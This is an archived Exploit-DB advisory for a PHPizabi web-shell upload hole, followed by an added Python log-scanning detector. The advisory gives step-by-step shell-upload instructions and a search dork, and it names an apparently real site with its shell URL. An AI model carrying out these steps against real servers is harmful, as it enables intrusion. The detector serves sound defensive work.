- 18 Dec 2022
- EDB-ID
- 5136
- EDB Verified
- Passed
- Author
- ZORLU
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- cve-2008-0805
- Publication date
- 2008-02-17
Code:
############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload
author: ZoRLu
home: www.yildirimordulari.org
contact: [email protected]
dork: "Powered by PHPizabi v0.848b C1 HFP1"
############################################
exploit:
http://localhost/izabi/system/cache/pictures/id_shell.php
-first register web site
-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )
-event title and description write. show to select All the users. gözat button click and shell.php upload
-after go to event page. upload photo right click. open the menu click to properties. copy the url
example:
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
and
exploit:
http://localhost/izabi/system/cache/pictures/xxx_shell.php
example web site:
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
exploit shell.php
http://bitchinindie.com/system/cache/pictures/597_shell.php
##################################################
thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasırga(lavrens), avkidis, head_hunter
and all users yildirimordulari.org
siircicocuk, where have you been, buddy? get on msn, we miss you :)))
## whether yildirimordulari.org will open again or not, nobody knows, but one thing is known: it is a legend ##
#################################################
# milw0rm.com [2008-02-17]
- Source
- www.exploit-db.com
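
A detection sketch for the upload path described in the advisory above, added here as an example and not part of the original post or the exploit-db entry: it scans web access logs for script-named files requested from `system/cache/pictures/` or passed to `system/image.php`. The extension list, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Extensions a PHP-enabled server may execute (assumed list; match it to your handler config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)
UPLOAD_DIR = "/system/cache/pictures/"  # upload cache directory named in the advisory
IMAGE_HANDLER = "/system/image.php"     # image script named in the advisory
# Common/combined access log prefix: client, timestamp, request line, status.
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client, reason, filename) for a suspicious request, else None."""
    m = REQ.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    path = unquote(url.path)
    name = path.rsplit("/", 1)[-1]
    if UPLOAD_DIR in path and SCRIPT_EXT.search(name):
        # 200 means the server answered for a script stored among uploaded pictures.
        reason = "script-served-from-upload-dir" if status == "200" else "script-probe-in-upload-dir"
        return client, reason, name
    if path.endswith(IMAGE_HANDLER):
        for value in parse_qs(url.query).get("file", []):
            if SCRIPT_EXT.search(value):
                return client, "script-name-passed-to-image-handler", value
    return None

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges, made-up file ids), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [17/Feb/2008:10:00:01 +0000] "GET /izabi/system/cache/pictures/12_photo.jpg HTTP/1.1" 200 8123',
    '203.0.113.7 - - [17/Feb/2008:10:00:02 +0000] "GET /izabi/system/image.php?file=12_photo.jpg&width=500 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [17/Feb/2008:10:05:10 +0000] "GET /izabi/system/image.php?file=13_shell.php&width=500 HTTP/1.1" 200 0',
    '198.51.100.9 - - [17/Feb/2008:10:05:12 +0000] "GET /izabi/system/cache/pictures/13_shell.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [17/Feb/2008:10:05:20 +0000] "GET /izabi/system/cache/pictures/14_shell.php HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

A `script-served-from-upload-dir` hit means the server returned a 200 for a script-named file inside the picture cache. Disabling script execution for that directory removes the impact independently of any upload filtering.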